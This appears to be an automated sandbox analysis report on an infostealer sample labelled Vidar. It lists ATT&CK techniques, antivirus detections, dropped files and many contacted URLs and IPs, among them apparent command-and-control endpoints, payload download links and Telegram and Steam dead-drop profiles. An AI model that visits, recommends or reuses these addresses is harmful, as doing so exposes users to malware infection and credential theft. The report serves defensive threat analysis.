Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D8E7 sqlite3_bind_blob64,	3_2_61E2D8E7
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E038CA sqlite3_bind_parameter_count,	3_2_61E038CA
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E158CA sqlite3_bind_parameter_index,	3_2_61E158CA
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E038DC sqlite3_bind_parameter_name,	3_2_61E038DC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_61E2D8B8 sqlite3_bind_blob,	3_2_61E2D8B8

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Windows Service	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	23 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Bypass User Access Control	2 Obfuscated Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Defacement
Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	1 Bypass User Access Control	1 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Service Execution	Logon Script (Mac)	1 Windows Service	1 Masquerading	2 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	222 Process Injection	21 Virtualization/Sandbox Evasion	LSA Secrets	55 System Information Discovery	SSH	12 Clipboard Data	Data Transfer Size Limits	125 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	222 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	12 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yaALNupJCH.exe	76%	ReversingLabs	Win32.Spyware.Vidar
yaALNupJCH.exe	74%	Virustotal		Browse
yaALNupJCH.exe	100%	Avira	TR/Redcap.imosn
yaALNupJCH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	100%	Avira	TR/AD.GenSteal.aekjv
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	100%	Avira	BDS/Backdoor.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	63%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	52%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	52%	ReversingLabs	Win32.Spyware.Vidar

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
transdi.org	7%	Virustotal		Browse
geoplugin.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://95.141.41.12/n9kd3X/index.php9	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpp8	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpE	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpespace	0%	Avira URL Cloud	safe
http://116.202.2.169:1333/temp.zip	0%	Avira URL Cloud	safe
http://transdi.org/host.exe3jd/index.php0c	100%	Avira URL Cloud	malware
http://pixcode.com.mx/svchost.exexg	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.php9	0%	Virustotal		Browse
http://116.202.2.169:1333/temp.zip	0%	Virustotal		Browse
http://116.202.2.169:1333/t	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exeV	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpNq	0%	Avira URL Cloud	safe
http://transdi.org/host.exeZ	100%	Avira URL Cloud	malware
http://geoplugin.net/json.gp/C	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpspace	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpk	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpodq	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.php(	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpatch	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.php1	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpspace	0%	Virustotal		Browse
http://95.141.41.12/n9kd3X/index.phpRs	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpon	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp/C	0%	Virustotal		Browse
http://95.141.41.12/n9kd3X/index.phpv	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpdq	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exeat	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exerd	0%	Avira URL Cloud	safe
http://transdi.org/host.exe8	100%	Avira URL Cloud	malware
http://transdi.org/host.exe5	100%	Avira URL Cloud	malware
http://95.141.41.12/n9kd3X/index.phpU	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpY	0%	Avira URL Cloud	safe
http://transdi.org/svchost.dll	100%	Avira URL Cloud	malware
http://95.141.41.12/n9kd3X/index.php_	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpx/svchost.exe	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpff.info5	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phph	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exews;	0%	Avira URL Cloud	safe
http://transdi.org/svchost.dll	0%	Virustotal		Browse
http://95.141.41.12/n9kd3X/index.phpn	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpPrg	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.php:A	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phptch	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpq	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exe	0%	Avira URL Cloud	safe
http://116.202.2.169:1333/al	0%	Avira URL Cloud	safe
http://95.141.41.12/n9g9ecOb3jd/index.php	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpVg	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phptc	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.phpion	0%	Avira URL Cloud	safe
http://116.202.2.169:1333/	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.php	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpcodedRq	0%	Avira URL Cloud	safe
http://95.141.41.12/n9-k	0%	Avira URL Cloud	safe
http://95.141.41.12/n9kd3X/index.php	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp_	0%	Avira URL Cloud	safe
http://mardukoff.info/kd3X/index.php	0%	Avira URL Cloud	safe
81.19.131.36	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpOn	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpl	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpp	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpded	0%	Avira URL Cloud	safe
http://pixcode.com.mx/svchost.exe4g	0%	Avira URL Cloud	safe
http://95.P	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpPb	0%	Avira URL Cloud	safe
http://mardukoff.info/	0%	Avira URL Cloud	safe
http://transdi.org/host.exe	100%	Avira URL Cloud	malware
http://95.141.41.12/n9kd3X/index.phpkernelbase.dll	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpHb	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp	0%	Avira URL Cloud	safe
mardukoff.info/g9ecOb3jd/index.php	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phpcoded	0%	Avira URL Cloud	safe
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	0%	Avira URL Cloud	safe
http://transdi.org/host.exe=o	100%	Avira URL Cloud	malware
http://95.141.41.12/n9	0%	Avira URL Cloud	safe
http://mardukoff.info/g9ecOb3jd/index.phprg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transdi.org	157.90.36.211	true	false	7%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	false	1%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
pixcode.com.mx	192.185.131.188	true	false		unknown
mardukoff.info	127.0.0.127	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://116.202.2.169:1333/temp.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199555780195	false		high
http://transdi.org/svchost.dll	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://pixcode.com.mx/svchost.exe	false	Avira URL Cloud: safe	unknown
http://116.202.2.169:1333/	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.php	true	Avira URL Cloud: safe	unknown
81.19.131.36	true	Avira URL Cloud: safe	unknown
https://t.me/solonichat	false		high
http://transdi.org/host.exe	false	Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp	false	Avira URL Cloud: safe	unknown
mardukoff.info/g9ecOb3jd/index.php	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://95.141.41.12/n9kd3X/index.phpespace	yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.php9	yaALNupJCH.exe, 00000000.00000003.945842153.000000000157A000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.945829879.000000000156A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	12600711246403711407151220.3.dr	false		high
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google	yaALNupJCH.exe, 00000003.00000003.895202513.000000000EBBC000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	false		high
http://95.141.41.12/n9kd3X/index.phpE	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpp8	yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://transdi.org/host.exe3jd/index.php0c	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pixcode.com.mx/svchost.exexg	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://116.202.2.169:1333/t	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pixcode.com.mx/svchost.exeV	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpNq	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://transdi.org/host.exeZ	yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp/C	yaALNupJCH.exe, 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost[1].exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpspace	yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpk	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/solonichatCA	yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mardukoff.info/g9ecOb3jd/index.phpodq	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.php(	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpatch	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.php1	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpRs	yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpon	yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpv	yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	12600711246403711407151220.3.dr	false		high
https://steamcommunity.com/profiles/76561199555780195update.zipopenopen_NULL%s	yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	false		high
http://mardukoff.info/g9ecOb3jd/index.phpdq	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pixcode.com.mx/svchost.exeat	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pixcode.com.mx/svchost.exerd	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://transdi.org/host.exe8	yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	false		high
http://transdi.org/host.exe5	yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://95.141.41.12/n9kd3X/index.phpU	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpY	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.php_	yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpx/svchost.exe	yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpff.info5	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phph	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pixcode.com.mx/svchost.exews;	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpn	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpPrg	yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/solonichatMA	yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://95.141.41.12/n9kd3X/index.phpq	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://116.202.2.169:1333/T	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/solonichatwF	yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/	yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.telegram.org	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mardukoff.info/g9ecOb3jd/index.php:A	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phptch	yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=.net	40080133769305826732791000.3.dr	false		high
http://116.202.2.169:1333/al	yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9g9ecOb3jd/index.php	yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/intl/en_uk/chrome/	yaALNupJCH.exe, 00000003.00000002.910498852.000000000EEB6000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	false		high
http://95.141.41.12/n9kd3X/index.phpVg	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=	yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phptc	yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://95.141.41.12/n9kd3X/index.phpion	yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.php	yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mardukoff.info/g9ecOb3jd/index.phpcodedRq	yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D	40080133769305826732791000.3.dr	false		high
http://95.141.41.12/n9-k	yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp_	yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high
